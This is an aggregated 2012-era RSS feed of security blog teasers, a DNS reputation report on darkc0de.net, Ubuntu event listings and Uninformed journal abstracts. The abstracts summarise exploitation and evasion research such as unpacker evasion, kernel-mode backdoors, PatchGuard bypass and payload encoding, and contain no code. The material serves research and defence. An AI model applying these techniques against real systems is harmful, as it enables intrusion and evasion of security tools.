http://www.offensivecomputing.net/?q=node/feed This week I will be presenting on scalable, automated baremetal malware analysis at Black Hat Europe. My presentation will coincide with the release of NVMTrace, a tool that facilitates automated baremetal sample processing using inexpensive hardware and freely available technologies. More information is available at the following link: Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis If you are attending Black Hat Europe and malware analysis is a topic of interest to you, please attend my talk. If you are interested but will not be in attendance, please let me know and I will make my whitepaper and slide set available to you.

==> BHO Reversing

http://www.offensivecomputing.net/?q=node/feed From a long time for those days (BHO is supported since IE 4.0) malware writers exploit BHO functionality to bully on IE users. Mostly evil BHO has two functionality ( for sure if we talk about bankers): - monitoring/logging requests sending by browser POST dump - password stealing - HTML page code dynamic modification HTML code injection - used for e.g - adding additional form fields intended to obtain, more amount of TAN codes or generally some (...) Read entire post here: BHO Reversing

==> Practical Malware Analysis - A Book Review and Curmudgeonly Rant on the State of Reverse Engineering

http://www.offensivecomputing.net/?q=node/feed Recently I was asked to review a pre-publication copy of Mike Sikorski and Andrew Honigs book Practical Malware Analysis by Nostarch Press. I gave it an enthusiastic review, and I strongly believe this will become the defacto text for learning malware analysis in the future. This is a review of that book, and a short rant on reverse engineering. Before getting into Practical Malware Analysis, I hope you will indulge me in a rant about other books on the reverse engineering topic: They are not pretty. If youve taken one of my classes I recommend a few books for learning reversing, but climbing the steep mountain of pre-requisite material before you can attempt to be somewhat proficient is daunting. Specifically the books I recommended were based off of each individual authors own personal style of reverse engineering with the tools that were available at the time. The field has gotten much more accessible thanks to the awesome tools that are out there from companies like Hex-Rays and Zynamics. Practical Malware Analysis does a good job of tying together the methods of modern malware analysis. While most of the previous texts have done a good job of presenting the state of the art at their time, PMA overviews many of the tools that are in use in the modern day. Part 1 starts off with the basic static techniques, how to set up a virtual environment, and dynamic analysis. These initial steps are the basis for any good reversing environment. What is nice is that these topics arent dwelled on for an entire book. Part 2 goes over the relationships of the Intel architecture, IDA Pro, modern compilers, and the Windows operating system to reverse engineering. Having an understanding of this as it applies to the reversing process is extremely important. Outside implementing a compiler, learning the fundamentals of the architecture is the most important skill a reverser can have for understanding the field. The difference between an adequate reverser and a great reverser lies in the understanding of how the system interactions work. The rest of the book is focused on the advanced topics of dynamic analysis. Part 5 deals with all the ways that malware authors can make your life miserable, from anti-disassembly to packers. Part 6, Special Topics, talks about shellcode analysis, C++ specifics, and the ever-looming threat of 64-bit malware. I suspect that there will be a second edition once 64-bit malware comes in vogue. Overall the book is excellent for those that are new to this field. Experts love to curmudgeonly talk about how nothing is new anymore, everything sucks, and pine for the good old days of reverse engineering with some wire-wrap, a lead pencil, a 9-volt Duracell, and a single LED. If you consider yourself one of these people, reading this book is going to feel a lot like wearing someone elses underwear. If, on the other hand, you read it and put aside your natural skepticism of all things new, you might learn something. I really do like this book. Edit 3/4/2012: I have no financial interest in the book. The only thing I received was a reviewers copy. This was not sponsored or paid for in any way by the authors or publishers.

==> CAST Slides: Hunting malware with Volatility v2.0

http://www.offensivecomputing.net/?q=node/feed Last week i had a speech at the CAST forum about hunting malware with volatility 2.0. On 40 slides i will introduce the main features of this powerful forensic framework. All memory dumps being discussed are snapshots from infected machines with modern malwares and rootkits. http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf

==> Introduction to IDA Python

http://www.offensivecomputing.net/?q=node/feed The Introduction to IDA Python document by Ero Carrera is one of the better documents on scripting the IDA Pro platform available. After talking with Ero directly, I have received permission to host the PDF directly on Offensive Computing to make it available long-term. Enjoy. Introduction to IDA Python by Ero Carrera Danny

==> CSI:Internet series - Spyeye detection with Volatility v2 and kernel debugging the TDL4 rootkit

http://www.offensivecomputing.net/?q=node/feed Just in case you missed my forensic analysis contributions for the CSI:Internet series on h-online.com... CSI:Internet - A trip into RAM http://www.h-online.com/security/features/CSI-Internet-A-trip-into-RAM-1339479.html CSI:Internet - Open heart surgery http://www.h-online.com/security/features/CSI-Internet-Open-heart-surgery-1350313.html Enjoy!

==> Windows Internals: SkipThreadAttach

http://www.openrce.org/rss/feeds/blogs written by waleedassar.

==> darkc0de.net

http://www.robtex.com/dns/darkc0de.net.rss Summary --- Incoming mail for darkc0de.net is handled by one mail server at directionfindfree.com. Darkc0de.net has one IP number (208.73.211.9). Darkc0de.com and darkc0de.org are similar domain names. Also check www.darkc0de.net. It has six inlinks. Darkc0de.net uses the IPv4 number 208.73.211.9 only and the primary mail server mail.directionfindfree.com. The IPv4 number 208.73.211.9 only There are several hundred of domains that only use the IPv4 number 208.73.211.9. Most of those use only the mail server mail.directionfindfree.com (example: estwana.com, hjesesign.com and static.inx-media.com ), most of them use the primary mail server mail.directionfindfree.com and the last resort mail server (example: sino-pearl.com, free-idol.com and 91858.net ) and three quarter of them are under the tld "com" (example: nce123.com, abreuimages.com and forrestbivens.com ). The mail server mail.directionfindfree.com only There are several hundred of domains that only use the mail server mail.directionfindfree.com. A third of those point only to the IP number 208.73.210.174 (example: albania.diantedotrono.net, ns14.www.nopcls.com and businessinf.com ), a third of them use only the IPv4 number 208.73.210.174 (example: ns.bestoncam.com, mail.petticonstruction.com and gonz0movies.com ) and a third of them use only the IPv4 number 208.73.211.9 (example: sip.solfone.net, sexxxtube.net and 52wglm.com ). Trustworthiness, vendor reliability and privacy of this site is very poor. (more on reputation).It is blacklisted in one list. Search for darkc0de.net. Domain Name Reputation: Source Result WOT Trustworthiness, vendor reliability and privacy of this site is very poor BLACKLIST LISTED IN BLACKLIST! multi.surbl.org Result -- The following pages contain combined information gathered by searching several sources. Navigate between the pages by clicking on the tabs above. Source Date Information Dec 12, 2012 2:02:33 PM Visible DNS Information Alexa Dec 12, 2012 2:02:33 PM Description, ranking and other stats rbls.org Dec 12, 2012 2:02:32 PM Blacklistings WOT Dec 11, 2012 2:02:04 PM Reputation Total score 0/50 normalized to 1 out of 5 based on 5 tests 1/5 Check Result NS on different IP networks NO NS delegation consistent with zone NO Listed in DMOZ NO Listed in Alexa top 100000 NO Good WOT rating NO Indexed in Google - - More pages on the Internet describing the domain: Google Safe Browsing | McAfee SiteAdvisor | Norton Safe Web | AVG | Web of Trust | rbls.org Alexa | DNS Tree | Whois info | Domain Info API | mnw |More... DNS Records ------- Base Record Pref Name IP-number Reverse Route Autonomous System darkc0de.net a 208.73.211.9 (none) 208.73.208.0/21Oversee 208-net AS33626 OVERSEE Proxy aut-num for Oversee by MZIMA mx 10 mail.directionfindfree.com 204.13.160.107 host204-13-160-107.oversee.net 204.13.160.0/22Oversee net ns b.gtld-servers.net 2001:503:231d::2:30 (none) ? 192.33.14.30 192.33.14.0/24VeriSign Route AS26415 VERISIGN-AS VeriSign, Inc g.gtld-servers.net 192.42.93.30 192.42.93.0/24VeriSign Route AS36624 VERISIGN-AS VeriSign, Inc h.gtld-servers.net 192.54.112.30 192.54.112.0/24VeriSign Route AS36623 VERISIGN-AS VeriSign, Inc a.gtld-servers.net 2001:503:a83e::2:30 ? 192.5.6.30 192.5.6.0/24VeriSign Route AS36621 VERISIGN-AS VeriSign, Inc k.gtld-servers.net 192.52.178.30 192.52.178.0/24VeriSign Route AS36622 VERISIGN-AS VeriSign, Inc d.gtld-servers.net 192.31.80.30 192.31.80.0/24VeriSign Route AS36617 VERISIGN-AS VeriSign, Inc e.gtld-servers.net 192.12.94.30 192.12.94.0/24VeriSign Route AS36629 VERISIGN-AS VeriSign, Inc j.gtld-servers.net 192.48.79.30 192.48.79.0/24VeriSign Route AS36626 VERISIGN-AS VeriSign, Inc l.gtld-servers.net 192.41.162.30 192.41.162.0/24VeriSign Route AS36628 VERISIGN-AS VeriSign, Inc i.gtld-servers.net 192.43.172.30 192.43.172.0/24VeriSign Route AS36616 VERISIGN-AS VeriSign, Inc f.gtld-servers.net 192.35.51.30 192.35.51.0/24VeriSign Route AS36620 VERISIGN-AS VeriSign, Inc m.gtld-servers.net 192.55.83.30 192.55.83.0/24VeriSign Route AS36627 VERISIGN-AS VeriSign, Inc c.gtld-servers.net 192.26.92.30 192.26.92.0/24VeriSign Route AS36618 VERISIGN-AS VeriSign, Inc gtld-servers.net oversee.net com directionfindfree.com Graph - darkc0de.net Shared -- IP numbers of host (1 item) * 208.73.211.9 Mail servers used by this domain (1 item) * mail.directionfindfree.com IP numbers of mail servers (1 item) * 204.13.160.107 Reverse names of the mail servers (1 item) * host204-13-160-107.oversee.net Other names of the mail servers (100 items) * 10.mtngprs.net * 5jbcourse.com * africanairport.com * aislebridal.com * all-you-can-dance.com * aparthotel-piccolo-suceava.promotur.ro.htmlfacebook.com * aperitivws.com * banatdrem.com * barstoolssupercenter.com * befaster.com * benift.com * bentiey.com * bitadvertiser.com * ccphil.com * cenimelody.com * chinaiu.com * chinatimeshares.com * continteal.com * coolsmiles.net * cztableware.com * detgujarat.com * dicsoinary.com * dns2.thermadorsevice.com * dot-edu.org * eaini.com * easter1.com * eb2byellowpages.net * eurowrestlers.com * fanktube.com * filmedownload.tv * filter.100topcamsites.com * filterspam.net * flayproxy.com * fusiombd.com * gamesage.com * gkdns.com.realymodels.net * got-casino.com * hydrams.com * inboxhostelworld.com * indiabulles.com * ispmonitor.com * jaluzitamir.com * junkracecar.com * kannadawap.com * keezm0vies.com * kleintierinfo.net * legacyinmates.com * mail.camperplaatsen.net * mail.cat4.com * mail.dyehousefinishes.com * mail.geneticonline.com * mail.masmuebles.net * mail.powernutrition4you.com * mail.pstet.com * mail.www.bo * manhours.net * mavimex.com * ns0.lavafiles.com * ns1.adorabletv.com * obraspublicaspr.com * operetion7.com * orginalbtc.com * parsz.com * petforestonline.com * phoneriot.com * piratebay2.com * rawgonso.com * rentfortmyers.com * shuanthesheep.com * smtp76.siphonclix.com * southendbathrooms.com * sx40.com * taqadomy.com * teachbanzi.com * textbug.com * thechedimuscat.com * thinksexist.com * tuxoo.com * twinsync.com * underunder.com * versomina.com * wayyn.com * ww.masajbucuresti.com.htmlfacebook.com * www.162by.com * www.abaixak.com * www.aldultporn.com * www.annahangtattoo.com * www.cag.in * www.campwyoming.com * www.feertv.com * www.hvooh.com * www.movie28.com * www.mp4mobilemovie.net * www.mywaygames.com * www.ninhgiang.net * www.razkide.com * www.salmanimage.com * www.saxwab.com * www.wankatwork.com * xorras.com Host names beginning with darkc0de (2 items) * darkc0de.com * darkc0de.org Similarly spelled domains (1 item) * darkcde.net

==> Book Review: This Machine Kills Secrets

http://www.spacerogue.net/wordpress/?feed=rss2 Book Review: This Machine Kills Secrets By: Andy Greenberg Penguin Group 2012 ISBN 978-1-101-59358-5 *Page references have been taken from the electronic iPad version Ill admit I havent finished the whole book yet but the way the book portrays some events I was involved in differs from my own memory. I wanted to highlight those [...]

==> Hackers and Media Hype or Big Hacks That Never Really Happened

http://www.spacerogue.net/wordpress/?feed=rss2 I have been giving my talk “Hackers and Media Hype or Big Hacks That Never Really Happened” for a few months now and I think it is time to retire it. You may have seen it at Shmoocon Epilogue, Source Boston or Hope 9. If not catch the video below. I also have the entire [...]

==> Emails From Michael In Iran

http://www.spacerogue.net/wordpress/?feed=rss2 If publishing unsourced emails claiming to be from Iran is a newsworthy event then I guess we should all copy Mikko and do the same thing. A few years ago I received a chain of emails from ‘Michael’ that started out as the normal ‘teach me to hack’ emails I receive on an almost daily [...]

==> L0pht Hacker Space Visa

http://www.spacerogue.net/wordpress/?feed=rss2 The L0pht was not the first hacker space, in fact at the time of its creation in Boston there were at least two other such spaces, Sinister House and Messiah Village, which later moved and became New Hack City, or simply New Hack. L0pht wasnt even the cause of the recent explosion of hacker spaces [...]

==> FUD can Sometimes be Useful

http://www.spacerogue.net/wordpress/?feed=rss2 There has been a story making the rounds the last few weeks that is really bugging me. I was going to let it slide but the story just wont die and every time it comes around again I just get angrier. The problem is I dont think the story is actually true, which wouldnt be [...]

==> Handle Shmandle

http://www.spacerogue.net/wordpress/?feed=rss2 A lot of people ask me why I still use a handle and go by ‘Space Rogue’ instead of using my real name. Trust me it is kinda awkward to go to a respectable con like BSides, Blackhat or even RSA and introduce myself as ‘Space Rogue’. People always ask me to repeat myself as [...]

==> bleep the SCADA is Falling!!!

http://www.spacerogue.net/wordpress/?feed=rss2 Let me say first that SCADA (supervisory control and data acquisition) attacks are real, they do happen and should be a real concern. But if we look at the recent press surrounding such attacks we see little in the way of any hard evidence that such an attack actually occurred. Instead we see rumor and [...]

==> NASA Confirms but China Denies Satellite ‘hacking’

http://www.spacerogue.net/wordpress/?feed=rss2 Since I posted my previous item regarding my suspicions as to the validity of the claims of ‘interference’ with a US Government satellite there have a few more developments. First NASA has come out and ‘confirmed’ the interference. According to NASA PAO: “NASA experienced two suspicious events with the Terra spacecraft in the summer and [...]

==> Rebuttal – “Hackers reportedly behind U.S. government satellite disruptions”

http://www.spacerogue.net/wordpress/?feed=rss2 First some historical background, this is at least the third time I have seen a similar story over the last 15 years. “bleep ‘hackers’ can control a satellite”, the previous two times it turned out to be false. The first time I was one of the first people call the story suspect. It is hard [...]

==> We would like your feedback

http://www.spacerogue.net/wordpress/?feed=rss2 Getting your customers to fill out market satisfaction survey’s is all the rage these days. “We greatly appreciate your feedback ” Hey, its free demographic marketing! Its also usually ego stroking, studies show that people tend to skew their own responces to the positive side of things. Generally I don’t fill these things out at [...]

==> The Open Cloud Webinars: Stability, support and the latest cloud features: using the Ubuntu Cloud Archive

http://www.ubuntu.com/rss.xml The pace of innovation in the cloud is ferocious. And theres no better example than OpenStack - the fastest growing open source project ever, according to some reports. Join Ubuntu Server Engineering Manager Dave Walker, to learn how the Ubuntu Cloud Archive provides access to the very latest OpenStack features on long-term support releases of Ubuntu. The webinar will cover the principles behind the Ubuntu Cloud Archive and its use in the enterprise, enabling you and your organisation to make the most of the open cloud. Location: Online Time: Wed, 2012-11-07 16:00

==> The Open Cloud Webinars: Running OpenStack Folsom on Ubuntu 12.10 and Ubuntu 12.04 LTS

http://www.ubuntu.com/rss.xml The second webinar of our Ubuntu 12.10 series focuses on Folsom, the latest release of OpenStack. In this webinar, Ubuntu Server Engineering Manager Dave Walker will talk you through the process of deploying Folsom on Ubuntu 12.10 and 12.04 LTS, showcasing some of the unique deployment tools that make Ubuntu the fastest route to a fully-operative, enterprise-grade OpenStack cloud. Join us, learn more and ask questions live! Location: Online Time: Wed, 2012-10-31 17:00

==> The Open Cloud Webinars: New features in Ubuntu 12.10, the world’s most cloud-friendly OS

http://www.ubuntu.com/rss.xml Another 6 months has passed so it's time for next Ubuntu release! Join Mark Baker, Ubuntu Server Product Manager to find out about the new features in Ubuntu 12.10 and how you can take advantage of them. Whether you are new to Ubuntu or using it already this webinar will give you an insight into 12.10 for both server and cloud computing. Register today and ask questions live! Location: Online Time: Tue, 2012-10-23 16:00

==> Ubuntu Enterprise Summit

http://www.ubuntu.com/rss.xml The Ubuntu Enterprise Summit is a one-day conference aimed at technologists and IT decision-makers.At this years event, analysts and technologists will join key figures from Canonical, to discuss the new best practice and the road ahead for enterprise IT.For more information and to view the agenda, visit:http://uds.ubuntu.com/enterprise-summit/ Location: Copenhagen, Denmark Time: Tue, 2012-10-30 (All day)

==> Ubuntu Developer Summit

http://www.ubuntu.com/rss.xml Come and join us for yet another fantastic, action-packed Ubuntu Developer Summit!This time, we're in Europe at the Bella Centre in Copenhagen. Registration is free and spaces are limted so hurry!The Ubuntu Developer Summit is the event where we plan for the forthcoming version of Ubuntu. It brings together Canonical engineers, community members, partners, upstreamrepresentatives and cloud specialists, in an environment of active debate.For more information, visit:http://uds.ubuntu.com Location: Copenhagen, Denmark Time: Mon, 2012-10-29 (All day) - Thu, 2012-11-01 (All day)

==> DroidCon

http://www.ubuntu.com/rss.xml Canonical is a Partner Sponsor at the upcoming DroidCon event. Location: London, UK Time: Thu, 2012-10-25 (All day) - Fri, 2012-10-26 (All day)

==> Mass TLC: Cloud Summit

http://www.ubuntu.com/rss.xml Canonical will have a presence at Mass TLC's upcoming Cloud Summit.If you're in the area, stop by and say hello! Location: Boston, USA Time: Fri, 2012-10-19 (All day)

==> The OpenStack Summit

http://www.ubuntu.com/rss.xml Canonical is proud to be one of the premier sponsors of the OpenStack Summit.Ubuntu Founder, Mark Shuttleworth, will be presenting a keynote session and the Canonical team will be there, so stop by our booth and say hello!Canonical was the first company to commercially distribute and support OpenStack - and Ubuntu has remained the reference operating system for the OpenStack project since the beginning. We include it in every download and CD of Ubuntu Server, which gives us a huge interest in its continuing development.Canonical is also one of eight members of the OpenStack Foundation. Location: San Diego, USA Time: Mon, 2012-10-15 (All day) - Thu, 2012-10-18 (All day)

==> Zentyal Summit

http://www.ubuntu.com/rss.xml Canonical is proud to be a Premier Sponsor for the upcoming Zentyal Summit.Zentyal is an official Ubuntu Advantage Reseller.For more information, visit:http://events.zentyal.com/2012/10/04/zentyal-summit-2012-2/ Location: Zaragosa, Spain Time: Thu, 2012-10-04 (All day)

==> New Landscape Features and Functionality

http://www.ubuntu.com/rss.xml Landscape is the Ubuntu systems management tool, proven to save time and money when managing Ubuntu deployments at scale. Join this webinar to learn about new features including role-based access control, bare-metal provisioning and its full API, alongside reporting capabilities and other tools to give you total operational awareness. Youll gain a comprehensive insight into how Landscapes enterprise systems management and regulatory compliance functionality can help an organisation tame complexity. Location: Webinar Time: Thu, 2012-09-20 16:00

==> Using dual-mappings to evade automated unpackers

http://www.uninformed.org/uninformed.rss Automated unpackers such as Renovo, Saffron, and Pandora's Bochs attempt to dynamically unpack executables by detecting the execution of code from regions of virtual memory that have been written to. While this is an elegant method of detecting dynamic code execution, it is possible to evade these unpackers by dual-mapping physical pages to two distinct virtual address regions where one region is used as an editable mapping and the second region is used as an executable mapping. In this way, the editable mapping is written to during the unpacking process and the executable mapping is used to execute the unpacked code dynamically. This effectively evades automated unpackers which rely on detecting the execution of code from virtual addresses that have been written to.

==> Analyzing local privilege escalations in win32k

http://www.uninformed.org/uninformed.rss This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered.

==> Exploiting Tomorrow's Internet Today: Penetration testing with IPv6

http://www.uninformed.org/uninformed.rss This paper illustrates how IPv6-enabled systems with link-local and auto-configured addresses can be compromised using existing security tools. While most of the techniques described can apply to "real" IPv6 networks, the focus of this paper is to target IPv6-enabled systems on the local network.

==> Can you find me now? Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS

http://www.uninformed.org/uninformed.rss In August 2008 Verizon Wireless released a firmware upgrade for their xv6800 (rebranded HTC Titan) line of Windows Mobile smartphones that provided a number of new features previously unavailable on the device on the initial release firmware. In particular, support for accessing the device's built-in Qualcomm gpsOne assisted GPS chipset was introduced with this update. However, Verizon Wireless elected to attempt to lock down the GPS hardware on xv6800 such that only applications authorized by Verizon Wireless would be able to access the device's built-in GPS hardware and perform location-based functions (such as GPS-assisted navigation). The mechanism used to lock down the GPS hardware is entirely client-side based, however, and as such suffers from fundamental limitations in terms of how effective the lockdown can be in the face of an almost fully user-programmable Windows Mobile-based device. This article outlines the basic philosophy used to prevent unauthorized applications from accessing the GPS hardware and provides a discussion of several of the flaws inherent in the chosen design of the protection mechanism. In addition, several pitfalls relating to debugging and reverse engineering programs on Windows Mobile are also discussed. Finally, several suggested design alterations that would have mitigated some of the flaws in the current GPS lock down system from the perspective of safeguarding the privacy of user location data are also presented.

==> An Objective Analysis of the Lockdown Protection System for Battle.net

http://www.uninformed.org/uninformed.rss Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.

==> ActiveX - Active Exploitation

http://www.uninformed.org/uninformed.rss This paper provides a general introduction to the topic of understanding software vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.

==> Context-keyed Payload Encoding

http://www.uninformed.org/uninformed.rss A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information.

==> Improving Software Security Analysis using Exploitation Properties

http://www.uninformed.org/uninformed.rss Reliable exploitation of security vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration.

==> Real-time Steganography with RTP

http://www.uninformed.org/uninformed.rss Real-time Transfer Protocol (RTP) is used by nearly all Voice-over-IP systems to provide the audio channel for calls. As such, it provides ample opportunity for the creation of a covert communication channel due to its very nature. While use of steganographic techniques with various audio cover-medium has been extensively researched, most applications of such have been limited to audio cover-medium of a static nature such as WAV or MP3 file audio data. This paper details a common technique for the use of steganography with audio data cover-medium, outlines the problem issues that arise when attempting to use such techniques to establish a full-duplex communications channel within audio data transmitted via an unreliable streaming protocol, and documents solutions to these problems. An implementation of the ideas discussed entitled SteganRTP is included in the reference materials.

==> OS X Kernel-mode Exploitation in a Weekend

http://www.uninformed.org/uninformed.rss Apple's Mac OS X operating system is attracting more attention from users and security researchers alike. Despite this increased interest, there is still an apparent lack of detailed vulnerability development information for OS X. This paper will attempt to help bridge this gap by walking through the entire vulnerability development process. This process starts with vulnerability discovery and ultimately finished with a remote code execution. To help illustrate this process, a real vulnerability found in the OS X wireless device driver is used.

==> A Catalog of Local Windows Kernel-mode Backdoor Techniques

http://www.uninformed.org/uninformed.rss This paper presents a detailed catalog of techniques that can be used to create local kernel-mode backdoors on Windows. These techniques include function trampolines, descriptor table hooks, model-specific register hooks, page table modifications, as well as others that have not previously been described. The majority of these techniques have been publicly known far in advance of this paper. However, at the time of this writing, there appears to be no detailed single point of reference for many of them. The intention of this paper is to provide a solid understanding on the subject of local kernel-mode backdoors. This understanding is necessary in order to encourage the thoughtful discussion of potential countermeasures and perceived advancements. In the vein of countermeasures, some additional thoughts are given to the common misconception that PatchGuard, in its current design, can be used to prevent kernel-mode rootkits.

==> Generalizing Data Flow Information

http://www.uninformed.org/uninformed.rss Generalizing information is a common method of reducing the quantity of data that must be considered during analysis. This fact has been plainly illustrated in relation to static data flow analysis where previous research has described algorithms that can be used to generalize data flow information. These generalizations have helped support more optimal data flow analysis in certain situations. In the same vein, this paper describes a process that can be employed to generalize and persist data flow information along multiple generalization tiers. Each generalization tier is meant to describe the data flow behaviors of a conceptual software element such as an instruction, a basic block, a procedure, a data type, and so on. This process makes use of algorithms described in previous literature to support the generalization of data flow information. To illustrate the usefulness of the generalization process, this paper also presents an algorithm that can be used to determine reachability at each generalization tier. The algorithm determines reachability starting from the least specific generalization tier and uses the set of reachable paths found to progressively qualify data flow information for each successive generalization tier. This helps to constrain the amount of data flow information that must be considered to a minimal subset.

==> Reducing the Effective Entropy of GS Cookies

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be used to reduce the effective entropy in a given GS cookie by roughly 15 bits. This reduction is made possible because GS uses a number of weak entropy sources that can, with varying degrees of accuracy, be calculated by an attacker. It is important to note, however, that the ability to calculate the values of these sources for an arbitrary cookie currently relies on an attacker having local access to the machine, such as through the local console or through terminal services. This effectively limits the use of this technique to stack-based local privilege escalation vulnerabilities. In addition to the general entropy reduction technique, this paper discusses the amount of effective entropy that exists in services that automatically start during system boot. It is hypothesized that these services may have more predictable states of entropy due to the relative consistency of the boot process. While the techniques described in this paper do not illustrate a complete break of GS, any inherent weakness can have disastrous consequences given that GS is a static, compile-time security solution. It is not possible to simply distribute a patch. Instead, applications must be recompiled to take advantage of any security improvements. In that vein, the paper proposes some solutions that could be applied to address the problems that are outlined.

==> Memalyze: Dynamic Analysis of Memory Access Behavior in Software

http://www.uninformed.org/uninformed.rss This paper describes strategies for dynamically analyzing an application's memory access behavior. These strategies make it possible to detect when a read or write is about to occur at a given location in memory while an application is executing. An application's memory access behavior can provide additional insight into its behavior. For example, it may be able to provide an idea of how data propagates throughout the address space. Three individual strategies which can be used to intercept memory accesses are described in this paper. Each strategy makes use of a unique method of intercepting memory accesses. These methods include the use of Dynamic Binary Instrumentation (DBI), x86 hardware paging features, and x86 segmentation features. A detailed description of the design and implementation of these strategies for 32-bit versions of Windows is given. Potential uses for these analysis techniques are described in detail.

==> Mnemonic Password Formulas

http://www.uninformed.org/uninformed.rss The current information technology landscape is cluttered with a large number of information systems that each have their own individual authentication schemes. Even with single sign-on and multi-system authentication methods, systems within disparate management domains are likely to be utilized by users of various levels of involvement within the landscape as a whole. Due to this complexity and the abundance of authentication requirements, many users are required to manage numerous credentials across various systems. This has given rise to many different insecurities relating to the selection and management of passwords. This paper details a subset of issues facing users and managers of authentication systems involving passwords, discusses current approaches to mitigating those issues, and finally introduces a new method for password management and recalls termed Mnemonic Password Formulas.

==> Locreate: An Anagram for Relocate

http://www.uninformed.org/uninformed.rss This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation.

==> Exploiting 802.11 Wireless Driver Vulnerabilities on Windows

http://www.uninformed.org/uninformed.rss This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation.

==> Implementing a Custom X86 Encoder

http://www.uninformed.org/uninformed.rss This paper describes the process of implementing a custom encoder for the x86 architecture. To help set the stage, the McAfee Subscription Manager ActiveX control vulnerability, which was discovered by eEye, will be used as an example of a vulnerability that requires the implementation of a custom encoder.

==> Preventing the Exploitation of SEH Overwrites

http://www.uninformed.org/uninformed.rss This paper proposes a technique that can be used to prevent the exploitation of SEH overwrites on 32-bit Windows applications without requiring any recompilation.

==> Effective Bug Discovery

http://www.uninformed.org/uninformed.rss Sophisticated methods are currently being developed and implemented for mitigating the risk of exploitable bugs. The process of researching and discovering vulnerabilities in modern code will require changes to accommodate the shift in vulnerability mitigations

==> Wars Within

http://www.uninformed.org/uninformed.rss In this paper I will uncover the information exchange of what may be classified as one of the highest money making schemes coordinated by 'organized crime'. I will elaborate on information gathered from a third party individual directly involved in all aspects of the scheme at play.

==> Fingerprinting 802.11 Implementations via Statistical Analysis of the Duration Field

http://www.uninformed.org/uninformed.rss The research presented in this paper provides the reader with a set of algorithms and techniques that enable the user to remotely determine what chipset and device driver an 802.11 device is using.

==> Improving Automated Analysis of Windows x64 Binaries

http://www.uninformed.org/uninformed.rss As Windows x64 becomes a more prominent platform, it will become necessary to develop techniques that improve the binary analysis process. In particular, automated techniques that can ...

==> Exploiting the Otherwise Non-Exploitable on Windows

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be applied in certain situations to gain arbitrary code execution through software bugs that would not otherwise be exploitable, such ...

==> Abusing Mach on Mac OS X

http://www.uninformed.org/uninformed.rss This paper discusses the security implications of Mach being integrated with the Mac OS X kernel. A few examples are used to illustrate how Mach support can be used to bypass some of the BSD security features, ...

==> GREPEXEC: Grepping Executive Objects from Pool Memory

http://www.uninformed.org/uninformed.rss As rootkits continue to evolve and become more advanced, methods that can be used to detect hidden objects must also evolve. For example, relying on system provided APIs to ...

==> Anti-Virus Software Gone Wrong

http://www.uninformed.org/uninformed.rss Anti-virus software is becoming more and more prevalent on end-user computers today. Many major computer vendors (such as Dell) bundle anti-virus software and other personal security suites in the default ...

==> Bypassing PatchGuard on Windows x64

http://www.uninformed.org/uninformed.rss The version of the Windows kernel that runs on the x64 platform has introduced a new feature, nicknamed PatchGuard, that is intended to prevent both malicious software and third-party vendors ...

==> Windows Kernel-mode Payload Fundamentals

http://www.uninformed.org/uninformed.rss This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the ...

==> Analyzing Common Binary Parser Mistakes

http://www.uninformed.org/uninformed.rss With just about one file format bug being consistently released on a weekly basis over the past six to twelve months, one can only hope developers would look and learn. The reality of it ...

